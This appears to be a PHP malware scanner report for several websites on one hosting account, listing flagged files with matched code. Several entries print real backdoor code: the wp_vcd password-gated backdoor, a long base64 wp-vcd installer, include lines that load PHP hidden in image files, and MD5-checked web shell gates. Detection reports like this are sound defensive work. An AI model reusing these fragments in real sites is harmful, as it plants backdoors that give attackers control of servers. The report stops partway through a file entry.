| Function eval Line: 32 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($sem_get)
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-admin/user/wp-class.php Size: 4.59 kB Created: 2021-04-16 10:12:11 Modified: 2021-04-16 10:12:11 Dangers: 1
| Description | Match |
|---|
Sign 3a6c61ab Line: 48 Dangerous Malware Signature (hash: 3a6c61ab) | <?php {
$z=$n[3];
$name="moban";
}
if($_GET['dir']){
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-content/plugins/js_composer/include/classes/shortcodes/shortcodes.php Size: 41.59 kB Created: 2018-05-07 19:34:36 Modified: 2019-03-09 22:14:53 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1154 Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${$control_var}
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-column.php Size: 8.42 kB Created: 2018-05-07 19:34:36 Modified: 2019-03-09 22:14:54 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 57 Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${$control_var}
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-row.php Size: 8.26 kB Created: 2018-05-07 19:34:36 Modified: 2019-03-09 22:14:54 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 72 Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${$control_var}
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-content/plugins/offshore-core/widgets.php Size: 6.78 kB Created: 2018-05-07 19:28:03 Modified: 2019-03-09 22:15:06 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function( '', 'register_widget("Offshore_Stock_Widget");' ) ); add_filter( 'stag_custom_sidebars_widget_args', 'offshore_sidebar_args' ); function offshore_sidebar_args( $args ) { return $args = array( 'before_widget' => '<div id="%1$s" class="widget %2$s">', 'after_widget' => '</div>', 'before_title' => '<h3 class="sidebar-title">', 'after_title' => '</h3>', )
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-content/plugins/revslider/admin/views/navigation-editor.php Size: 80.30 kB Created: 2018-05-07 19:28:19 Modified: 2019-03-09 22:15:18 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 686 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php riny
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-content/plugins/revslider/admin/views/slide-editor.php Size: 85.25 kB Created: 2018-05-07 19:28:19 Modified: 2019-03-09 22:15:18 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] | <?php exec(a);var b=null,c=null,d=null,e=null;a&&(null!==a[1]&&a[1]&&(b=parseInt(a[1],10)),null!==a[2]&&a[2]&&(c=parseInt(a[2],10)),null!==a[3]&&a[3]&&(d=parseInt(a[3],10)),null!==a[4]&&a[4]&&(e=/^[0-9]+$/.test(a[4])?parseInt(a[4],10):a[4]));return new y(b,c,d,e)};function A(a,b,c,d,e,f,g,h){this.N=a;this.k=h}A.prototype.getName=function(){return this.N};function B(a){this.a=a}var ea=new A("Unknown",0,0,0,0,0,0,new x(!1,!1));
B.prototype.parse=function(){var a;if(-1!=this.a.indexOf("MSIE")||-1!=this....
| Sign 4a069524 Line: 356 Dangerous Malware Signature (hash: 4a069524) | <?php a,b,c,d,e,f,g
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-content/plugins/revslider/includes/framework/functions-wordpress.class.php Size: 28.90 kB Created: 2018-05-07 19:28:19 Modified: 2019-03-09 22:15:19 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function('', 'return register_widget("'.$widgetName.'");')); } public static function getImagePathFromURL($urlImage){ $baseUrl = self::getUrlUploads(); $pathImage = str_replace($baseUrl, "", $urlImage); return($pathImage); } public static function getImageRealPathFromUrl($urlImage){ $filepath = self::getImagePathFromURL($urlImage); $realPath = RevSliderFunctionsWP::getPathUploads().$filepath; return($realPath); } public static function getImageUrlFromPath($pathImage){ $pathLower = strtolo...
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-content/plugins/revslider/includes/navigation.class.php Size: 194.61 kB Created: 2018-05-07 19:28:19 Modified: 2019-03-09 22:15:18 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 278 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php riny
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-content/plugins/revslider/includes/output.class.php Size: 233.99 kB Created: 2018-05-07 19:28:19 Modified: 2019-03-09 22:15:19 Warns: 5 Dangers: 2
| Description | Match |
|---|
Exploit concat Line: 2838 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $add_data.$last_trigger_state.$htmlVideoAutoplay.$htmlVideoNextSlide.$htmlVideoThumbnail.$htmlHidden.$htmlMute.$htmlDisableOnMobile.$htmlCover.$htmlDotted.
| Exploit concat Line: 818 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $htmlEaseIn.$htmlEaseOut.$htmlDuration.$htmlLink.$htmlThumb.$htmlDelay.$htmlRotation.$htmlFirstTrans.$htmlPerformance.$htmlStopPurpose.
| Exploit concat_vars_with_spaces Line: 2838 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code | <?php $htmlCover.$htmlDotted.$htmlRatio.$htmlRewind.$htmlStartAt.$htmlEndAt.
| Exploit concat_vars_with_spaces Line: 818 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code | <?php $htmlEaseIn.$htmlEaseOut.$htmlDuration.$htmlLink.$htmlThumb.$htmlDelay.
| Exploit infected_comment Line: 5230 Warning Comments composed by 5 random chars usually used to detect if a file is infected yet | <?php /*ready*/
| Sign 84abfe10 Line: 2838 Dangerous Malware Signature (hash: 84abfe10) | <?php $add_data.$last_trigger_state.$htmlVideoAutoplay.$htmlVideoNextSlide.$htmlVideoThumbnail.$htmlHidden.$htmlMute.$htmlDisableOnMobile.$htmlCover.$htmlDotted.$htmlRatio.$htmlRewind.$htmlStartAt.$htmlEndAt.$htmlCoverPause.
| Sign 84abfe10 Line: 818 Dangerous Malware Signature (hash: 84abfe10) | <?php $htmlEaseIn.$htmlEaseOut.$htmlDuration.$htmlLink.$htmlThumb.$htmlDelay.$htmlRotation.$htmlFirstTrans.$htmlPerformance.$htmlStopPurpose.
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-content/plugins/cpaddons-site-software.php Size: 1.58 kB Created: 2017-11-01 17:45:18 Modified: 2019-03-09 22:14:34 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function( '$a', "return null;" ) ); add_filter( 'pre_site_transient_update_core', create_function( '$a', "return null;" ) )
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-content/themes/offshore/classes/widgets.php Size: 45.47 kB Created: 2018-05-07 19:26:35 Modified: 2019-03-09 22:15:39 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function( '', 'register_widget("Offshore_Icons_Widget");' ) ); class Offshore_Download_Widget extends WP_Widget { function __construct() { parent::__construct( 'offshore_download_widget', esc_html__( 'Offshore Download Button', 'offshore' ), array( 'class' => 'offshore_media_upload', 'description' => esc_html__( 'Displays a download button', 'offshore' ) ) ); add_action( 'admin_enqueue_scripts', array( $this, 'upload_scripts' ) ); add_action( 'admin_footer', array( $this, 'custom_script' ...
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-content/themes/offshore/functions.php Size: 11.27 kB Created: 2018-05-07 19:26:35 Modified: 2019-03-09 22:15:38 Dangers: 6
| Description | Match |
|---|
Sign 241a94f3 Dangerous Malware Signature (hash: 241a94f3) | <?php <?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '7d1c7090114999eda996b7ed2eab59da'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign 407651f7 Line: 114 Dangerous Malware Signature (hash: 407651f7) | <?php wp-tmp.php
| Sign 471b95ee Line: 110 Dangerous Malware Signature (hash: 471b95ee) | <?php stripos($tmpcontent, $wp_auth_key)
| Sign 50db2c9d Line: 2 Dangerous Malware Signature (hash: 50db2c9d) | <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '7d1c7090114999eda996b7ed2eab59da'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign 97c00b82 Dangerous Malware Signature (hash: 97c00b82) | <?php <?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '7d1c7090114999eda996b7ed2eab59da'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign a408f408 Line: 184 Dangerous Malware Signature (hash: a408f408) | <?php class.theme-modules.php
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-includes/wp-vcd.php Size: 12.69 kB Created: 2018-05-07 19:27:19 Modified: 2019-03-09 22:16:07 Warns: 1 Dangers: 17
| Description | Match |
|---|
Exploit base64_long Line: 5 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA...
| Sign 0f37c730 Line: 5 Dangerous Malware Signature (hash: 0f37c730) | <?php mdW5jdGlvb
| Sign 407651f7 Line: 5 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
| Sign 4a069524 Line: 5 Dangerous Malware Signature (hash: 4a069524) | <?php aW5jbHVkZ
| Sign 7186bb8d Line: 5 Dangerous Malware Signature (hash: 7186bb8d) | <?php RlZmluZ
| Sign 7830f7a6 Line: 5 Dangerous Malware Signature (hash: 7830f7a6) | <?php N0YX
| Sign 7f5d33bf Line: 5 Dangerous Malware Signature (hash: 7f5d33bf) | <?php jbG9zZ
| Sign 91535293 Line: 5 Dangerous Malware Signature (hash: 91535293) | <?php leHRyYWN0
| Sign 963e968a Line: 5 Dangerous Malware Signature (hash: 963e968a) | <?php pbmNsdWRl
| Sign a408f408 Line: 5 Dangerous Malware Signature (hash: a408f408) | <?php cHJlZ19yZXBsYWNl
| Sign ae7830db Line: 5 Dangerous Malware Signature (hash: ae7830db) | <?php yZXBsYWNl
| Sign bced5841 Line: 5 Dangerous Malware Signature (hash: bced5841) | <?php 8P3Boc
| Sign d30fc49e Line: 5 Dangerous Malware Signature (hash: d30fc49e) | <?php b3Blb
| Sign d97f004d Line: 5 Dangerous Malware Signature (hash: d97f004d) | <?php ZXh0cmFjd
| Sign de12c454 Line: 5 Dangerous Malware Signature (hash: de12c454) | <?php V4dHJhY3
| Sign e6546205 Line: 5 Dangerous Malware Signature (hash: e6546205) | <?php kX1JFUVVFU1
| Sign ee1cb326 Line: 5 Dangerous Malware Signature (hash: ee1cb326) | <?php 9wZW
| Sign eefb0b0b Line: 8 Dangerous Malware Signature (hash: eefb0b0b) | <?php $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-includes/post.php Size: 207.06 kB Created: 2018-05-07 19:27:19 Modified: 2019-03-09 22:16:07 Dangers: 1
| Description | Match |
|---|
Sign 407651f7 Line: 1 Dangerous Malware Signature (hash: 407651f7) | <?php wp-vcd
|
|
/custdata02/duane/public_html/janitorialevs.com/librariesn/index.php Size: 87.28 kB Created: 2021-04-16 13:57:36 Modified: 2021-04-16 13:57:36 Warns: 4 Dangers: 1
| Description | Match |
|---|
Exploit concat_vars_array Line: 2632 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{12}.$O00O0O{0}.$O00O0O{13}.$O00O0O{63}.$O00O0O{2}.$O00O0O{14}.$O00O0O{12}
| Exploit concat_vars_array Line: 477 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{9}.$O00O0O{4}.$O00O0O{0}.$O00O0O{13}.$O00O0O{17}.$O00O0O{14}.$O00O0O{11}
| Exploit concat_vars_array Line: 478 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{13}.$O00O0O{0}.$O00O0O{18}.$O00O0O{20}.$O00O0O{3}.$O00O0O{8}.$O00O0O{14}
| Exploit password_protection_md5 Line: 653 Warning MD5 Password protection file, typically used on web shells | <?php md5($_POST["test"])=='b6772c68627f804a9578152ee90f5b0c'
| Sign a408f408 Line: 533 Dangerous Malware Signature (hash: a408f408) | <?php curl_get_from_webpage
|
|
/custdata02/duane/public_html/nonationmusic.com/templates/atomic/templates.php Size: 1.82 kB Created: 2019-02-28 02:21:45 Modified: 2019-03-09 22:25:28 Dangers: 1
| Description | Match |
|---|
Sign 3a6c61ab Line: 1 Dangerous Malware Signature (hash: 3a6c61ab) | <?php { $z=$n[3]; $name="moban"; } if($_GET["dir"]){
|
|
/custdata02/duane/public_html/nonationmusic.com/index.php Size: 208.00 B Created: 2020-01-08 07:19:53 Modified: 2020-01-08 07:56:18 Dangers: 1
| Description | Match |
|---|
Sign b236d073 Line: 2 Dangerous Malware Signature (hash: b236d073) | <?php //installbg
$rifilename='/custdata02/duane/public_html/nonationmusic.com/httpdocs/images/buttons/bios1s.jpg';
require("$rifilename");
//installend
|
|
/custdata02/duane/public_html/steviekeys.com/SK/wp-admin/includes/update-cores.php Size: 4.98 kB Created: 2014-09-04 17:08:08 Modified: 2020-01-08 07:56:18 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit concat_vars_array Line: 5 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{7}.$O00O0O{19}.$O00O0O{19}.$O00O0O{15}.$O00O0O{64}.$O00O0O{65}.$O00O0O{65}
| Sign 689d8acc Line: 44 Dangerous Malware Signature (hash: 689d8acc) | <?php if(isset($act) && $act == 'redate' && isset($redate_file)){
if(file_exists($redate_file)){
echo rdFile($redate_file);
}
}
| Sign f822975d Line: 45 Dangerous Malware Signature (hash: f822975d) | <?php if(file_exists($redate_file)){
|
|
/custdata02/duane/public_html/steviekeys.com/SK/wp-admin/maint/repairs.php Size: 4.98 kB Created: 2014-09-04 17:08:08 Modified: 2020-01-08 07:56:18 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit concat_vars_array Line: 5 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{7}.$O00O0O{19}.$O00O0O{19}.$O00O0O{15}.$O00O0O{64}.$O00O0O{65}.$O00O0O{65}
| Sign 689d8acc Line: 44 Dangerous Malware Signature (hash: 689d8acc) | <?php if(isset($act) && $act == 'redate' && isset($redate_file)){
if(file_exists($redate_file)){
echo rdFile($redate_file);
}
}
| Sign f822975d Line: 45 Dangerous Malware Signature (hash: f822975d) | <?php if(file_exists($redate_file)){
|
|
/custdata02/duane/public_html/steviekeys.com/SK/wp-content/plugins/floating-social-media-icon/function.php Size: 60.72 kB Created: 2015-06-09 01:21:40 Modified: 2019-03-09 22:30:31 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function('', 'return register_widget("Acx_Social_Icons_Widget");')); function acurax_optin() { echo ""; } function socialicons_comparison($ad=2) { $ad_1 = '
</hr>
<a name="compare"></a><div id="ss_middle_wrapper">
<div id="ss_middle_center">
<div id="ss_middle_inline_block">
<div class="middle_h2_1">
<h2>Limited on Features ?</h2>
<h3>Compare and Decide</h3>
</div><!-- middle_h2_1 -->
<div id="ss_features_table">
<div id="ss_tabl...
|
|
/custdata02/duane/public_html/steviekeys.com/SK/wp-content/plugins/floating-social-media-icon/troubleshoot.php Size: 7.57 kB Created: 2015-06-09 01:21:40 Modified: 2019-03-09 22:30:31 Dangers: 1
| Description | Match |
|---|
Function strrev eval_strrev Line: 104 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
|
|
/custdata02/duane/public_html/steviekeys.com/SK/wp-content/themes/advantage/functions.php Size: 27.19 kB Created: 2017-03-24 23:01:52 Modified: 2019-03-09 22:30:32 Dangers: 5
| Description | Match |
|---|
Sign 241a94f3 Dangerous Malware Signature (hash: 241a94f3) | <?php <?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'be9bf3e9aa332e951fe7c55b5b3f1057'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign 407651f7 Line: 114 Dangerous Malware Signature (hash: 407651f7) | <?php wp-tmp.php
| Sign 471b95ee Line: 110 Dangerous Malware Signature (hash: 471b95ee) | <?php stripos($tmpcontent, $wp_auth_key)
| Sign 50db2c9d Line: 2 Dangerous Malware Signature (hash: 50db2c9d) | <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'be9bf3e9aa332e951fe7c55b5b3f1057'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign 97c00b82 Dangerous Malware Signature (hash: 97c00b82) | <?php <?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'be9bf3e9aa332e951fe7c55b5b3f1057'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
|
|
/custdata02/duane/public_html/steviekeys.com/SK/wp-content/wflogs/rules.php Size: 662.82 kB Created: 2024-06-12 17:07:44 Modified: 2024-06-12 22:26:51 Dangers: 1
| Description | Match |
|---|
Sign d30fc49e Line: 1401 Dangerous Malware Signature (hash: d30fc49e) | <?php backdoor
|
|
/custdata02/duane/public_html/steviekeys.com/SK/wp-content/wflogs/config-transient.php Size: 1.46 MB Created: 2024-06-12 17:07:46 Modified: 2024-06-12 22:26:51 Warns: 2 Dangers: 6
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "MwNidCYwm3tfNTxvwsJlffTcO1HBYrtfpS1t9rJPzymfzKYbeLZaqvIVXurQkJkXfOYPN+sdRvDBF1veHHBH0nnAd9iqn2TkbH1tO+Makokx8tGlA6pGmTZhInI+EVSjTO37iNUp7ORxz6dMH1TMLMCS3JCvY2IVr6pCyfU0VbfadykCUYxRc4G8ItSrTiqk5uAi/o5YCguelni12hIH72sn91xKSaGf74UqdnWIht3k3vEUHBt8YxA4YqPPm9jiRix5a4QWHkhMlzk7sjqHGlengPkHOf/HqFn8Tzc7L2eflXtv0XLyZm8FP5PG40x5uYBHEJaHkkJrtcl9dqzXnQ=="
| Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "e1VwEjFmXzYuAT8xAAlXSAY4V3gydyowdQRebHhAHwpHMEAgFT1jHkEhZgokd3BnM3JkCjceCTwxYRk/ahY0CAxVEBJJNXABAQUPMiRlTzkGTRRreAkqYUoxGmx4Rh90OntvD14VHR5LIWYAPxljBy5iGQpJJCY8Tx8ZTWpoEAh8K2ISTwUNAgJ0P08kGzs5dDgNLAgJKh8GMRpsBjQfeDp7b3EsFREeS0tmDD9nEXlQYhUKN2sJQjFhGT8YFm4efFUQEkMFDQECeD8xVmVFOXg4c2cICSphdDEWbAY0YQo6d29xFCxjYDUhFHJBZx15LhBrdAgZdzwxbRlBWRZudnxZEGwxe3MCcAZBMVplO0sGRnNrCHdYHwoxGmx4Rh90OntvD14VHSY1X2ZyTWcdeVBia3g3ZwlCMR9rPxQWbnZ8WRBsCAUNfHJ4DAMeS1FRBRVdOTZaBGEET2RsABwrPxUGVTocLGMeVhJKExNTT0wcWFh0R2d...
| Function strrev eval_strrev Line: 6 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php laVE
| Function strrev exec_strrev Line: 6 Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php cEXE
| Sign 34b7e999 Line: 6 Dangerous Malware Signature (hash: 34b7e999) | <?php DzE1R
| Sign 7830f7a6 Line: 6 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0yX
| Sign ae7830db Line: 6 Dangerous Malware Signature (hash: ae7830db) | <?php Y2hY
| Sign de12c454 Line: 6 Dangerous Malware Signature (hash: de12c454) | <?php VjAg
|
|
/custdata02/duane/public_html/steviekeys.com/SK/wp-includes/wp-vcd.php Size: 12.69 kB Created: 2018-05-07 19:27:19 Modified: 2019-03-09 22:30:37 Warns: 1 Dangers: 17
| Description | Match |
|---|
Exploit base64_long Line: 5 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA...
| Sign 0f37c730 Line: 5 Dangerous Malware Signature (hash: 0f37c730) | <?php mdW5jdGlvb
| Sign 407651f7 Line: 5 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
| Sign 4a069524 Line: 5 Dangerous Malware Signature (hash: 4a069524) | <?php aW5jbHVkZ
| Sign 7186bb8d Line: 5 Dangerous Malware Signature (hash: 7186bb8d) | <?php RlZmluZ
| Sign 7830f7a6 Line: 5 Dangerous Malware Signature (hash: 7830f7a6) | <?php N0YX
| Sign 7f5d33bf Line: 5 Dangerous Malware Signature (hash: 7f5d33bf) | <?php jbG9zZ
| Sign 91535293 Line: 5 Dangerous Malware Signature (hash: 91535293) | <?php leHRyYWN0
| Sign 963e968a Line: 5 Dangerous Malware Signature (hash: 963e968a) | <?php pbmNsdWRl
| Sign a408f408 Line: 5 Dangerous Malware Signature (hash: a408f408) | <?php cHJlZ19yZXBsYWNl
| Sign ae7830db Line: 5 Dangerous Malware Signature (hash: ae7830db) | <?php yZXBsYWNl
| Sign bced5841 Line: 5 Dangerous Malware Signature (hash: bced5841) | <?php 8P3Boc
| Sign d30fc49e Line: 5 Dangerous Malware Signature (hash: d30fc49e) | <?php b3Blb
| Sign d97f004d Line: 5 Dangerous Malware Signature (hash: d97f004d) | <?php ZXh0cmFjd
| Sign de12c454 Line: 5 Dangerous Malware Signature (hash: de12c454) | <?php V4dHJhY3
| Sign e6546205 Line: 5 Dangerous Malware Signature (hash: e6546205) | <?php kX1JFUVVFU1
| Sign ee1cb326 Line: 5 Dangerous Malware Signature (hash: ee1cb326) | <?php 9wZW
| Sign eefb0b0b Line: 8 Dangerous Malware Signature (hash: eefb0b0b) | <?php $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
|
|
/custdata02/duane/public_html/steviekeys.com/templates/atomic/templates.php Size: 1.82 kB Created: 2019-02-28 02:21:56 Modified: 2019-03-09 22:30:39 Dangers: 1
| Description | Match |
|---|
Sign 3a6c61ab Line: 1 Dangerous Malware Signature (hash: 3a6c61ab) | <?php { $z=$n[3]; $name="moban"; } if($_GET["dir"]){
|
|
/custdata02/duane/public_html/steviekeys.com/.wysiwygPro_preview_fb6eb313807cb73d881b89ea45cb35d4.php Size: 220.00 B Created: 2012-01-02 07:51:33 Modified: 2019-03-09 22:30:23 Dangers: 1
| Description | Match |
|---|
Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) | <?php zDhjf
|
|
/custdata02/duane/public_html/steviekeys.com/index.php Size: 254.00 B Created: 2020-01-08 07:19:53 Modified: 2020-01-08 07:56:18 Dangers: 1
| Description | Match |
|---|
Sign b236d073 Line: 2 Dangerous Malware Signature (hash: b236d073) | <?php //installbg
$rifilename='/custdata02/duane/public_html/steviekeys.com/Photos/Pages/Album_art_files/Media/CD-Fatt-Paradise-Lost/CD-Fatt-Paradise-Losts.jpg';
require("$rifilename");
//installend
|
|
/custdata02/duane/public_html/steviekeys.com/maint/index.php Size: 115.83 kB Created: 2020-01-08 07:24:46 Modified: 2020-01-08 07:24:46 Warns: 6 Dangers: 9
| Description | Match |
|---|
Exploit concat_vars_array Line: 2682 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{7}.$O00O0O{19}.$O00O0O{19}.$O00O0O{15}.$O00O0O{64}.$O00O0O{65}.$O00O0O{65}
| Exploit concat_vars_array Line: 3062 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{14}.$O00O0O{17}.$O00O0O{4}.$O00O0O{63}.$O00O0O{23}.$O00O0O{24}.$O00O0O{25}
| Exploit concat_vars_array Line: 401 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{13}.$O00O0O{64}.$O00O0O{8}.$O00O0O{13}.$O00O0O{2}.$O00O0O{11}.$O00O0O{20}
| Exploit concat_vars_array Line: 404 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{64}.$O00O0O{12}.$O00O0O{14}.$O00O0O{3}.$O00O0O{62}.$O00O0O{18}.$O00O0O{4}
| Exploit concat_vars_array Line: 563 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{19}.$O00O0O{22}.$O00O0O{12}.$O00O0O{1}.$O00O0O{0}.$O00O0O{12}.$O00O0O{0}
| Exploit password_protection_md5 Line: 1703 Warning MD5 Password protection file, typically used on web shells | <?php md5($_POST["test"])=='b6772c68627f804a9578152ee90f5b0c'
| Sign 0d0fd2c0 Line: 102 Dangerous Malware Signature (hash: 0d0fd2c0) | <?php $arr_word[0][] ="8";$arr_word[0][] ="6";$arr_word[0][] ="7";$arr_word[0][] ="9";$arr_word[0][] ="4";$arr_word[0][] ="5";$arr_word[0][] ="3";$arr_word[0][] ="5";$arr_word[0][] ="4";$arr_word[0][] ="11";$arr_word[0][] ="10";$arr_word[0][] ="6";$arr_word[0][] ="7";$arr_word[0][] ="2";$arr_word[0][] ="8";$arr_word[1][] ="8";$arr_word[1][] ="7";$arr_word[1][] ="5";$arr_word[1][] ="11";$arr_word[1][] ="9";$arr_word[1][] ="2";$arr_word[1][] ="6";$arr_word[1][] ="7";$arr_word[1][] ="5";$arr_word[1][] ="...
| Sign 0f37c730 Line: 601 Dangerous Malware Signature (hash: 0f37c730) | <?php moban.html
| Sign 471b95ee Line: 1574 Dangerous Malware Signature (hash: 471b95ee) | <?php str_replace('define("PRENAME","20160409");', 'define("PRENAME"
| Sign 689d8acc Line: 2721 Dangerous Malware Signature (hash: 689d8acc) | <?php if(isset($act) && $act == 'redate' && isset($redate_file)){
if(file_exists($redate_file)){
echo rdFile($redate_file);
}
}
| Sign 99fc3b9d Line: 2625 Dangerous Malware Signature (hash: 99fc3b9d) | <?php $data = curl_get_from_webpage_one_time($url
| Sign a408f408 Line: 493 Dangerous Malware Signature (hash: a408f408) | <?php curl_get_from_webpage
| Sign f822975d Line: 1703 Dangerous Malware Signature (hash: f822975d) | <?php if(file_exists($redate_file)){
| Sign ff4f5344 Line: 2652 Dangerous Malware Signature (hash: ff4f5344) | <?php function curl_get_from_webpage_one_time($url
| Sign ff4f5344 Line: 2931 Dangerous Malware Signature (hash: ff4f5344) | <?php function rmhtmltag2($tagname='',$str=''){
$rulers = '#<'.$tagname
|
|
/custdata02/duane/public_html/steviekeys.com/maint/install.php Size: 130.45 kB Created: 2020-01-08 07:56:18 Modified: 2020-01-08 07:56:18 Warns: 7 Dangers: 8
| Description | Match |
|---|
